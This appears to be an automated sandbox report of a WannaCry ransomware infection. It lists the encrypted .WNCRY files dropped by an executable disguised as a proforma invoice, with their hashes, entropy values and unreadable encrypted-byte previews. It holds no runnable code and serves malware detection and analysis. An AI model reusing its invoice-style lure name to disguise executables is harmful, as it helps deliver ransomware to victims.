                                                          Preview:WANACRY!....$s:..~.a...:\..+...%.S..j...:....&d;..B|..z.....$....).;D.>?....!P..t,....E5......^.A=..f..zo*.....w.J.6...E,.~..-.JT..'k.e..e.w...za....Vj.G.v..k.=.j....5z`^;Ax..U....wh{.U=...*.n.}.d ....P.. ..5.e[.&.v..5..g .(.<.&_......s.......oz@......g.............%....coX....b...~...c+v..<......4.0.n.ol.x..s.e...>.S.6...A..[..m..ET.-.#J&..2O...r.1..r.....R.....Om..e..v..&;..a...(.......A.....R.a.....Thz...FL.......F.8.....v..l....TQ...p.r.).1...~$C.p.o..p...X..f.....~0lD1P.B.._.3.t.8.X.Q{G...>...L...YHV...]7%.)..B...`3...&...P...."....+..[.Rd-.&....)$..H;.>.Ah.._...u\.O.g.P7.8L.*..(....N.......bO.4r..M ..~%...+*...d...C....Xf.d.Z.3.....@.......f....*.....jbi..E..6.H.*.t.*...,.*.!}\..T|...;..x..T..M....Xf.k<..'.......z..'.h.?...H.j.....<....|.- ..=.h...3.._ _......2da..n:]f=_#.n.....Q.A..Pt..jX..AF.....zM.......Fs..5..=..~.F...0.e.,x.1.Ur..2....{..s.ZM....Z..\.xY...N..m.{...M.U&...cj...}..J}. .*e..........E,T.c.1.Y..41.....:..er.L....lU......

                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6856
                                                          Entropy (8bit):7.972626004561927
                                                          Encrypted:false
                                                          SSDEEP:96:oJPm5V2rx0cVTHl7IwR25G6VSGbS20LrI1VKJWOYlnifgKTjA4s8YkyKeAk4f60:+PCs6mHM59VSVWA0iIKQqYHKeAk4fV
                                                          MD5:52A459919CF43A3907C6618EEF9C1EB7
                                                          SHA1:41CFD55DD6DF10D3B4B5C4E591CC0E39FF478E32
                                                          SHA-256:E7B2C25C073FB737CB98BA03F7622EECE658E1305B0D03DB3A13729AC57E9634
                                                          SHA-512:2327727D9E21C02FA0A7FD0DD3911524BEACC17472A3490BCEA3A4A5DF4E73689BF05827315591D18C5F4B1799E16A5F5E9D90C40190C4AD72A72C4388D862CA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......2...q2Z.m..~.`....B.Z..lP..|....)...EH+..q....-..at..U.j.:3.\6.....sN...|..X..j.t.kcp..k. ....n.`....?../.XZ.0...*(c3v2.@E.....Z..%..CEG..b..9.WY...._km..u..tgzqF...+.....y./.....e......2.s*.......~..`{l............Z......E2yJ....5l...b.bT.............m5........F.$.6.X..X.K.[E.7.;E.jC.X.....YV..p..g.Kj!..Q...D_.+.WU).n..u<..&J...+.j..<..w.NA _.T....n.v4.<.....R...]..8~.....%.G.....).s........Z......\|....Nvz..'.....xz....8x.qlO....I.<..Cv7A{...:m..(......8..q......?Z..~...\rI........qd.s31..9.}...j|....b_s..u....;n.F.=....).6.d...&....Hn^....a"....A.I.......^<..2..k}%SNR.....M..n..."k.+.....gF..j..._m.@......Ne8.......o...'u.....js`V.dR.]..+O...Qk.(,....q..mV+..f.z.h.\...v;I....>.;.z..u^....XF.....?..ud)..g].,#,.iy.........m.)r....}.6a..X...g..E.........M.z...pgr.).S}...".a8...*D.d.........D'....>^..6`......s....d.......K.WbEStQ..X..D.....ga.?rm....'.........q2 w.k.+.C.....j...k.'.q..+W4.@........0r1.p.&.].7....lK.1w_l

                                                          C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):6856
                                                          Entropy (8bit):7.972626004561927
                                                          Encrypted:false
                                                          SSDEEP:96:oJPm5V2rx0cVTHl7IwR25G6VSGbS20LrI1VKJWOYlnifgKTjA4s8YkyKeAk4f60:+PCs6mHM59VSVWA0iIKQqYHKeAk4fV
                                                          MD5:52A459919CF43A3907C6618EEF9C1EB7
                                                          SHA1:41CFD55DD6DF10D3B4B5C4E591CC0E39FF478E32
                                                          SHA-256:E7B2C25C073FB737CB98BA03F7622EECE658E1305B0D03DB3A13729AC57E9634
                                                          SHA-512:2327727D9E21C02FA0A7FD0DD3911524BEACC17472A3490BCEA3A4A5DF4E73689BF05827315591D18C5F4B1799E16A5F5E9D90C40190C4AD72A72C4388D862CA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......2...q2Z.m..~.`....B.Z..lP..|....)...EH+..q....-..at..U.j.:3.\6.....sN...|..X..j.t.kcp..k. ....n.`....?../.XZ.0...*(c3v2.@E.....Z..%..CEG..b..9.WY...._km..u..tgzqF...+.....y./.....e......2.s*.......~..`{l............Z......E2yJ....5l...b.bT.............m5........F.$.6.X..X.K.[E.7.;E.jC.X.....YV..p..g.Kj!..Q...D_.+.WU).n..u<..&J...+.j..<..w.NA _.T....n.v4.<.....R...]..8~.....%.G.....).s........Z......\|....Nvz..'.....xz....8x.qlO....I.<..Cv7A{...:m..(......8..q......?Z..~...\rI........qd.s31..9.}...j|....b_s..u....;n.F.=....).6.d...&....Hn^....a"....A.I.......^<..2..k}%SNR.....M..n..."k.+.....gF..j..._m.@......Ne8.......o...'u.....js`V.dR.]..+O...Qk.(,....q..mV+..f.z.h.\...v;I....>.;.z..u^....XF.....?..ud)..g].,#,.iy.........m.)r....}.6a..X...g..E.........M.z...pgr.).S}...".a8...*D.d.........D'....>^..6`......s....d.......K.WbEStQ..X..D.....ga.?rm....'.........q2 w.k.+.C.....j...k.'.q..+W4.@........0r1.p.&.].7....lK.1w_l

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{5B246DB7-240F-41D6-864B-DFEAEA6DE058}mt45299826.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8984
                                                          Entropy (8bit):7.981059760859407
                                                          Encrypted:false
                                                          SSDEEP:192:hkoYeiBQdJKbstzSC9+1b1onqc1Gf6EsuOtwZyPm0NlGAN9JjbT6:hnYPBQdpSC9jmf6EsZtAGrNI8JjbT6
                                                          MD5:12DFB28E4D2A4C9E6BD6200A8DECF2C6
                                                          SHA1:40E339A2301258414F8402974440AF0BC7D6C3ED
                                                          SHA-256:76D7BAABB97BDE10F26449910B7382BCCC0B9C0AF189C099F80EA54C91086A3E
                                                          SHA-512:AC90099B84877CF256B983AAEF9BE2EBE26894A41D40E13906A2ABD2235132F71F2962ECF747F1D58C97216CE493F4EFE06E093E7AB8CF9450BCF89C4D0EE6ED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....w..d.k..7....J.....]...r.T.wj.%}..^W&..V..l3_.1|L.n..............X.......J.(bv...eE.%...x...8..N..x.ANp.....>{.9{t.....vr.o(.a eQ..p.d.D..].............X...V.-....A...>$.p.;.xSY..)....d.R%..xP.iQ...\.......|.i..GZ.v..i{......V4.DM...Q.z.....!........(>l..?.3/.......H.t83....];.O....].T..e.\..u+`...Y..j.E.i...f.5._.~7.y......|xA..j:?.A.....#.+.3(...%...>3.}.ze y..r.7M]~.9.1[|.MkC.......T..p.J..{T*..p<..[..4..W8.r.-..=...@H&.....0Dl.s.x=..&i...j(v...J']...<....C)E.L..Q.]J...S.Q./...-k....H....r.~..I-..ng.W.aa...Y.{.........t<.....B$. ..w..]..v..:.....<L...L.m.#.\.z....z..MT....v_.R2..-.|B.F...yd..@.&.r.vn..I..&T..PC...Xe._....f.(..~.|...{!......o....%.......,'Z..Ya...)!....N!_.....)._.7I;[y..Kg5<.$S......DM..ai...6...D....K....g...+.T%i-.....62!....y.Z <%.F.P...VV...6.....c.o=.Gj..%*..8..9..7j...u\...y.%..d..zt2|O.........R|./............vF..C.....MM...S...W..1._...x.W.6yW.(.A..AKd.v.W...].3)....~...,....oOk

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{5B246DB7-240F-41D6-864B-DFEAEA6DE058}mt45299826.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8984
                                                          Entropy (8bit):7.981059760859407
                                                          Encrypted:false
                                                          SSDEEP:192:hkoYeiBQdJKbstzSC9+1b1onqc1Gf6EsuOtwZyPm0NlGAN9JjbT6:hnYPBQdpSC9jmf6EsZtAGrNI8JjbT6
                                                          MD5:12DFB28E4D2A4C9E6BD6200A8DECF2C6
                                                          SHA1:40E339A2301258414F8402974440AF0BC7D6C3ED
                                                          SHA-256:76D7BAABB97BDE10F26449910B7382BCCC0B9C0AF189C099F80EA54C91086A3E
                                                          SHA-512:AC90099B84877CF256B983AAEF9BE2EBE26894A41D40E13906A2ABD2235132F71F2962ECF747F1D58C97216CE493F4EFE06E093E7AB8CF9450BCF89C4D0EE6ED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....w..d.k..7....J.....]...r.T.wj.%}..^W&..V..l3_.1|L.n..............X.......J.(bv...eE.%...x...8..N..x.ANp.....>{.9{t.....vr.o(.a eQ..p.d.D..].............X...V.-....A...>$.p.;.xSY..)....d.R%..xP.iQ...\.......|.i..GZ.v..i{......V4.DM...Q.z.....!........(>l..?.3/.......H.t83....];.O....].T..e.\..u+`...Y..j.E.i...f.5._.~7.y......|xA..j:?.A.....#.+.3(...%...>3.}.ze y..r.7M]~.9.1[|.MkC.......T..p.J..{T*..p<..[..4..W8.r.-..=...@H&.....0Dl.s.x=..&i...j(v...J']...<....C)E.L..Q.]J...S.Q./...-k....H....r.~..I-..ng.W.aa...Y.{.........t<.....B$. ..w..]..v..:.....<L...L.m.#.\.z....z..MT....v_.R2..-.|B.F...yd..@.&.r.vn..I..&T..PC...Xe._....f.(..~.|...{!......o....%.......,'Z..Ya...)!....N!_.....)._.7I;[y..Kg5<.$S......DM..ai...6...D....K....g...+.T%i-.....62!....y.Z <%.F.P...VV...6.....c.o=.Gj..%*..8..9..7j...u\...y.%..d..zt2|O.........R|./............vF..C.....MM...S...W..1._...x.W.6yW.(.A..AKd.v.W...].3)....~...,....oOk

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{7799FD4F-1C90-48A8-A66A-C0E9B8019F3B}mt16400647.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7384
                                                          Entropy (8bit):7.972213263078049
                                                          Encrypted:false
                                                          SSDEEP:96:obozSouF8F9aqDQzuqJvOweMP+n/z4PIB/HtbJPa37FMubF6PXzsZl0YjMYR:QozSGnZKv3WKIB/HtlaLuub4fzsgYoYR
                                                          MD5:413D240F36C639465028481527EAC0BE
                                                          SHA1:BC3719D98BBD810B643011D9659B2E0B768127DA
                                                          SHA-256:6C727DB1BE3A778235CA3B081E0983656A584800BF73DF0ACD37BA5A4ABF2984
                                                          SHA-512:86125C7682CDE65AEBB6A32F84705BFA2B830CEE7774F09AC5E1CBF163243774444964BC1C79B2920272EC831EB9B2096984D8164F42926BF033A0C5B0B618A5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....bC|..a.L...s{P....'R?.B.....(C.S..`G].j..2.9uD..R4.W>.n.B..).n`a...X.%...@W3z...F...6Y..Y.td{a....;ee.T(.;....5:E...,.).n4.x.u...DWO.)..K.;.%G....o@.).'5.2...Q..G.`....[........(....V.....T..9.oe..[....{..af.....*....:....1..H..d...n..<..x...p.....................r5........Tic".<)...B.Y.I..lPm.p..?....kU.*-hs.NT.AH.[8|a.]BH`..=.D.....$...(.g.L.......q....xdi..g.aaD......%..........&#O..).9.lk|!...cis#.....D.0.m.5/r.3c....SP..0.....+#...^.0..@.= .|.[......y......!2...../6]w.Q./`C..O3<...C..2.Vx.].(........q...$.8d."...T.].s.@2@1W.Q...T.].Y-KI..Nc.!.v~d..[.u....(.Zbk...O....9..........o..g.i....jcQYw......1.<.p<....h..B..?r.1E-...e...9{EB6..\G3u.5..?.O....S.9.T.~..=.z....+.%.....O...9~s.\..=!...d.H..^..b......h...r.W.gL."c.Y..:7".ky....\]...K)...<...=.i.o..I*).e../.g-....I...T.k..Vq#L.lr.........i.7.V.c..x..1....;..H......7!.G.....p....b..`.&.ac.c....;me.(^.uE.9l....Z.Z9.F1....P $.#...m}.k...N.1G.zE.g]..76).(Q..M..2<o...t...AX.5.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{7799FD4F-1C90-48A8-A66A-C0E9B8019F3B}mt16400647.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7384
                                                          Entropy (8bit):7.972213263078049
                                                          Encrypted:false
                                                          SSDEEP:96:obozSouF8F9aqDQzuqJvOweMP+n/z4PIB/HtbJPa37FMubF6PXzsZl0YjMYR:QozSGnZKv3WKIB/HtlaLuub4fzsgYoYR
                                                          MD5:413D240F36C639465028481527EAC0BE
                                                          SHA1:BC3719D98BBD810B643011D9659B2E0B768127DA
                                                          SHA-256:6C727DB1BE3A778235CA3B081E0983656A584800BF73DF0ACD37BA5A4ABF2984
                                                          SHA-512:86125C7682CDE65AEBB6A32F84705BFA2B830CEE7774F09AC5E1CBF163243774444964BC1C79B2920272EC831EB9B2096984D8164F42926BF033A0C5B0B618A5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....bC|..a.L...s{P....'R?.B.....(C.S..`G].j..2.9uD..R4.W>.n.B..).n`a...X.%...@W3z...F...6Y..Y.td{a....;ee.T(.;....5:E...,.).n4.x.u...DWO.)..K.;.%G....o@.).'5.2...Q..G.`....[........(....V.....T..9.oe..[....{..af.....*....:....1..H..d...n..<..x...p.....................r5........Tic".<)...B.Y.I..lPm.p..?....kU.*-hs.NT.AH.[8|a.]BH`..=.D.....$...(.g.L.......q....xdi..g.aaD......%..........&#O..).9.lk|!...cis#.....D.0.m.5/r.3c....SP..0.....+#...^.0..@.= .|.[......y......!2...../6]w.Q./`C..O3<...C..2.Vx.].(........q...$.8d."...T.].s.@2@1W.Q...T.].Y-KI..Nc.!.v~d..[.u....(.Zbk...O....9..........o..g.i....jcQYw......1.<.p<....h..B..?r.1E-...e...9{EB6..\G3u.5..?.O....S.9.T.~..=.z....+.%.....O...9~s.\..=!...d.H..^..b......h...r.W.gL."c.Y..:7".ky....\]...K)...<...=.i.o..I*).e../.g-....I...T.k..Vq#L.lr.........i.7.V.c..x..1....;..H......7!.G.....p....b..`.&.ac.c....;me.(^.uE.9l....Z.Z9.F1....P $.#...m}.k...N.1G.zE.g]..76).(Q..M..2<o...t...AX.5.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{90890CB0-F806-4021-BE9C-4EB97114B98E}mt10000137.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5240
                                                          Entropy (8bit):7.966717696349995
                                                          Encrypted:false
                                                          SSDEEP:96:oXrc/V9CBlgHKS/cXnJTPH3fdLvUNzNXejz1vXdUQomiTuUEBAqe6y3Ie545+xjV:+I/V9CBoLcX5XfdUdNXaBvDETuBPe5Dz
                                                          MD5:2EF0D9626DEF5489F1DB7F88575DBC86
                                                          SHA1:D4F5A5AE7DF0FA25435BD5CDDF3929C345A03772
                                                          SHA-256:8481255236E3649354D673BF52932618D593A503BFDE5736AC504C6985A0E188
                                                          SHA-512:FEEC8C7E04D85F2702158C5C0B98B8746AD1D6172877A3E7E1AB3AC30055EFC6766C0A1A9DAE4153A6033ADD0149BE874FFE8E66A76EE73304DBCDE83AD4DBE3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Z..j....H&.d...F...X\7..yh+..4.z%..H.}....W.>...d.i......ej.7.*....3....Z.....)..=?......F.Q.6.iNn.R:Sv..zz..yw..u9t.$...T.;......0..+J3.....l2....D8.Qd.0.fjf.B....h...hT.s...:.E.[.J|'.a..........!.8...w.9...pZ...,...%o.....Ni.z.q.k.b..53p...^....._.......c.p6?e....1....q..|V8.-S....5...i...0..a..._3.Ac|...i..Im.."d.."1+}TS..p.59c...|..x..A.......U..H...ID.s.p..H..n2.......m..d.V.$..y]...S....p!..v.....8w.M~.....D.j.g^>.5LBC.).%$k...n.d.u]..}.v..a0..^.wo.4..-...T....z.M.M$.8bW^.;..o3...z.....&c...[..S..p*. .3y..C:.C.8.u.Mr.rf.4...&N.$'.o....wP!.....y..@GV.......O.......2..n.r.... .KT.8..u.5.N.R.-&..<tw..!B..pL...!.<.Y.s..mT...&2.b.e|.q...5..z6.(..u........>.....7bA/...p.....#....!..= .h.......l.w-.jn`s..N...8..+...d.-A.\.G........N5...6W.|!bbt.D.s..n.n.4<...s...|e..o..m.n..lO../B.X..hP(....W..!.A..l...h.+.ky(w...j.C......T.d..!./.6...b<.......p.~........4.-.....!0.6... ...D.v<.O..Cl....N...i.?.PS...JVLe......$$.FLJ*R.k...

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{90890CB0-F806-4021-BE9C-4EB97114B98E}mt10000137.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5240
                                                          Entropy (8bit):7.966717696349995
                                                          Encrypted:false
                                                          SSDEEP:96:oXrc/V9CBlgHKS/cXnJTPH3fdLvUNzNXejz1vXdUQomiTuUEBAqe6y3Ie545+xjV:+I/V9CBoLcX5XfdUdNXaBvDETuBPe5Dz
                                                          MD5:2EF0D9626DEF5489F1DB7F88575DBC86
                                                          SHA1:D4F5A5AE7DF0FA25435BD5CDDF3929C345A03772
                                                          SHA-256:8481255236E3649354D673BF52932618D593A503BFDE5736AC504C6985A0E188
                                                          SHA-512:FEEC8C7E04D85F2702158C5C0B98B8746AD1D6172877A3E7E1AB3AC30055EFC6766C0A1A9DAE4153A6033ADD0149BE874FFE8E66A76EE73304DBCDE83AD4DBE3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....Z..j....H&.d...F...X\7..yh+..4.z%..H.}....W.>...d.i......ej.7.*....3....Z.....)..=?......F.Q.6.iNn.R:Sv..zz..yw..u9t.$...T.;......0..+J3.....l2....D8.Qd.0.fjf.B....h...hT.s...:.E.[.J|'.a..........!.8...w.9...pZ...,...%o.....Ni.z.q.k.b..53p...^....._.......c.p6?e....1....q..|V8.-S....5...i...0..a..._3.Ac|...i..Im.."d.."1+}TS..p.59c...|..x..A.......U..H...ID.s.p..H..n2.......m..d.V.$..y]...S....p!..v.....8w.M~.....D.j.g^>.5LBC.).%$k...n.d.u]..}.v..a0..^.wo.4..-...T....z.M.M$.8bW^.;..o3...z.....&c...[..S..p*. .3y..C:.C.8.u.Mr.rf.4...&N.$'.o....wP!.....y..@GV.......O.......2..n.r.... .KT.8..u.5.N.R.-&..<tw..!B..pL...!.<.Y.s..mT...&2.b.e|.q...5..z6.(..u........>.....7bA/...p.....#....!..= .h.......l.w-.jn`s..N...8..+...d.-A.\.G........N5...6W.|!bbt.D.s..n.n.4<...s...|e..o..m.n..lO../B.X..hP(....W..!.A..l...h.+.ky(w...j.C......T.d..!./.6...b<.......p.~........4.-.....!0.6... ...D.v<.O..Cl....N...i.?.PS...JVLe......$$.FLJ*R.k...

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{9AAA6158-70E1-479D-AF72-1A54FF1CC6EA}mt11829122.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14408
                                                          Entropy (8bit):7.988170201215875
                                                          Encrypted:false
                                                          SSDEEP:192:r7zLZIEm+gmEbZtNE2T+gUyUBn686LMoNWX0KDp2+7Jp8HjneBeELbE/CC1CJS+1:r7KEm+g5t3pUp68nN92k8jgh+7cOM
                                                          MD5:3381C2022EEBC99CAC98FBCE480D6AF0
                                                          SHA1:C83DB86CE643552556F6E29A4371609B83C68D5B
                                                          SHA-256:41BD1DBEF80B5BBE64AD9504B3EDF6FB912DF2AEE761B9AB8FD7E528303E0910
                                                          SHA-512:6193EB43CF2F52A828BDE161DFB9E3055D7A7D266D351A58AC565C6D581761B533974D476B4898B85EA65FD0C1A1BC93F1439D1E71207C8FBF78CEA512334062
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....ly..4.].\`.....]!..L..Tq....(.....!.k.o...;~.F4....A.;fp.....igCKT..9.f3..t._..J'0.b..Z.i..a.G..`....ZS.e..w.#.U@...?..6.e..B.....|[....>.W....q.....=G......`.......^3........8..lK.D8...O.h.&.B8K#^]..h.8..!..z2.vY.".].....k.5.{..."...^na"5......y......+7.......g.C.}.iN<_*QR.b^.l....p..#...#..*..D..^..=...A.s${."....*.1M .OU3..=....|d....M....c.!...L.uS....*..#...?.".^..Sw..v..z.......X.|.J.A./`,...~g`.".>.lM..".......i..n.Ld.5{......!d..x|J..........&......cn.^s3..C.(G..X'..)*)...+,.S{c&.P1.......lR.2..i..B......2fR..`..ZmZ0.Bm.....Y.L..;K..yP"..p...=c.Q.n....L.....O..........#Iw.u..<;.3.....>.>0...G6j.J."......l..W.jb.p.._....;ax./..k..#..<\4t.....:#sQ.D._I.T4....Q.vC.A.I.@....B\.;. s...x........6...O.L..Kq...?BT..O...nW.O......!..O.$h.....l<."..r.,.H...f.hS.zhJ...*.lp,..6..M...u,....."....>E|.j+...9.R..KtF'..K.o. .....U......B.....d...'...h.{lqk./...C...g..+.%..."ZN5......%. afrxu...S..rK$..H."e.C....y3..r..q{.n.0..t^._....d....

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{9AAA6158-70E1-479D-AF72-1A54FF1CC6EA}mt11829122.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):14408
                                                          Entropy (8bit):7.988170201215875
                                                          Encrypted:false
                                                          SSDEEP:192:r7zLZIEm+gmEbZtNE2T+gUyUBn686LMoNWX0KDp2+7Jp8HjneBeELbE/CC1CJS+1:r7KEm+g5t3pUp68nN92k8jgh+7cOM
                                                          MD5:3381C2022EEBC99CAC98FBCE480D6AF0
                                                          SHA1:C83DB86CE643552556F6E29A4371609B83C68D5B
                                                          SHA-256:41BD1DBEF80B5BBE64AD9504B3EDF6FB912DF2AEE761B9AB8FD7E528303E0910
                                                          SHA-512:6193EB43CF2F52A828BDE161DFB9E3055D7A7D266D351A58AC565C6D581761B533974D476B4898B85EA65FD0C1A1BC93F1439D1E71207C8FBF78CEA512334062
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....ly..4.].\`.....]!..L..Tq....(.....!.k.o...;~.F4....A.;fp.....igCKT..9.f3..t._..J'0.b..Z.i..a.G..`....ZS.e..w.#.U@...?..6.e..B.....|[....>.W....q.....=G......`.......^3........8..lK.D8...O.h.&.B8K#^]..h.8..!..z2.vY.".].....k.5.{..."...^na"5......y......+7.......g.C.}.iN<_*QR.b^.l....p..#...#..*..D..^..=...A.s${."....*.1M .OU3..=....|d....M....c.!...L.uS....*..#...?.".^..Sw..v..z.......X.|.J.A./`,...~g`.".>.lM..".......i..n.Ld.5{......!d..x|J..........&......cn.^s3..C.(G..X'..)*)...+,.S{c&.P1.......lR.2..i..B......2fR..`..ZmZ0.Bm.....Y.L..;K..yP"..p...=c.Q.n....L.....O..........#Iw.u..<;.3.....>.>0...G6j.J."......l..W.jb.p.._....;ax./..k..#..<\4t.....:#sQ.D._I.T4....Q.vC.A.I.@....B\.;. s...x........6...O.L..Kq...?BT..O...nW.O......!..O.$h.....l<."..r.,.H...f.hS.zhJ...*.lp,..6..M...u,....."....>E|.j+...9.R..KtF'..K.o. .....U......B.....d...'...h.{lqk./...C...g..+.%..."ZN5......%. afrxu...S..rK$..H."e.C....y3..r..q{.n.0..t^._....d....

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{A1BEF0EC-55B5-48E6-88B2-B090A79161EF}mt66963475.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7944
                                                          Entropy (8bit):7.980425972677858
                                                          Encrypted:false
                                                          SSDEEP:192:lpvY3okPj5ctpuqRKoKU7R/TvEtUSQPzBXEHOrbFiyWd4CXlFo+0b6Q:lsl1ctzTdF/vBeO9WdL/Q
                                                          MD5:307589C3517C5898BA7FB2B972D4C6F6
                                                          SHA1:C600ED7136C90C60AF8566C3181174462913AFBC
                                                          SHA-256:DABA3827456A4ED3BAD2BA90649914798EF59F538F2F14C0BD6FA4DB70FDD5FD
                                                          SHA-512:187069D2E991AF765569D31DB1166B71347FD61A71917899C8B1B23C065B50E89BD9B16F3C4DBF2A868ED7A641A0A31706F2860B65E749094DE78A0C5F678815
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......4..<.A..u.J.>...a.ba....S...$h=..{....*.>2.M@.f.k....u.{[1..d..`xD*.:..y.....".t@..G..+D._]~.u...|...wY...OQN......U.Vu.^-h^...?.hP..<....m.....*..6NG.qB0g..\../...HO(../.<.|j..&.1.X...H.K*d....X....u?..s....L.x.......i......u...L!....Tj.............g......QQ..x.g........j..V.6..M.?......O5..5.O"C....Mi.!....,8...j...N.m...Yr.......u........o.z...#.<...........Xt....W5..g2.....:..o.q.(........7}.IQ.~x...S:.....Q....@..${..SC.y(....@/.....]..%.......w.=...A..o...3........2&...........xy..d.(...g.4.f..>_.m{L...N /...d"..\.8.`.....Q9..U6.By....UQ.=~-...C.>.b.jd.h;m#...PNhD\r..IYIg.@.Ku...Vc..H..M..ZAWE......b.[.......'..V.$...e.'.s+.[...>.v.S........](C.j..j......",j....b.+.]v.....Bq%Ea...0....}..e.X.y%Nb*D....{...>..k@...(..$.....Z|.o..vC.#.z#(.AS...K.P..'.z..f}.D.D...H1I."...~5...^..3r..."..U`..d>.?^..^.|.">.i....`..Ei.y..;V.K..;..oo.u.c..Mz.........{.Pm...0dF<.z+2K.n...u..h..A.+..i..'9.I....7.5.H2.7n.N.Tx...c.....

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\DTS\en-CH{EDAA83FF-51D7-4824-B535-F72B715C4190}\{A1BEF0EC-55B5-48E6-88B2-B090A79161EF}mt66963475.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7944
                                                          Entropy (8bit):7.980425972677858
                                                          Encrypted:false
                                                          SSDEEP:192:lpvY3okPj5ctpuqRKoKU7R/TvEtUSQPzBXEHOrbFiyWd4CXlFo+0b6Q:lsl1ctzTdF/vBeO9WdL/Q
                                                          MD5:307589C3517C5898BA7FB2B972D4C6F6
                                                          SHA1:C600ED7136C90C60AF8566C3181174462913AFBC
                                                          SHA-256:DABA3827456A4ED3BAD2BA90649914798EF59F538F2F14C0BD6FA4DB70FDD5FD
                                                          SHA-512:187069D2E991AF765569D31DB1166B71347FD61A71917899C8B1B23C065B50E89BD9B16F3C4DBF2A868ED7A641A0A31706F2860B65E749094DE78A0C5F678815
                                                          Malicious:false
                                                          Reputation:unknown
